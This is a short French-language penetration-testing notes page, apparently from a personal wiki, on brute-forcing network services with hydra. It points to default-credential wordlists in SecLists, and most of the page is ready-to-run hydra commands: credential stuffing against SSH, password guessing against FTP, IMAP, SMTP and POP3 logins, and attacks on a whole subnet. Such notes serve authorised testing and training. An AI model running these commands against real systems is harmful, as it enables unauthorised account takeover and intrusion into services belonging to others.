Skip to content

Bruteforcer un service

Sans connaitre un identifiant ou mot de passe

Comptes par défaut ou très fréquemment utilisés

Selon le service à attaquer, on pourra utiliser hydra avec le paramètre -C et fournir un dictionnaire (wordlist) contenant des couples utilisateur:mot_de_passe séparés par un :

Plusieures wordlist de ce type sont disponibles dans /usr/share/seclists/Passwords/Default-Credentials/ (notamment ftp-betterdefaultpasslist.txt)

Tenter des utilisateurs et mots de passe communs

Liste de comptes utilisateurs

On

hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN

# credential stuffing
hydra -C user_pass.list ssh://$TARGET_IP
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh

# bruteforce mail service password for known user
hydra -l 'rebrec@domain.com' -P password.list  $TARGET_IP smtp -t 64  
hydra -l 'rebrec@domain.com' -P password.list  $TARGET_IP pop3 -t 64 
hydra -l 'rebrec@domain.com' -P password.list  $TARGET_IP imap -t 64 

Plus d'exemple d'utilisation de l'outil : [[Hydra]]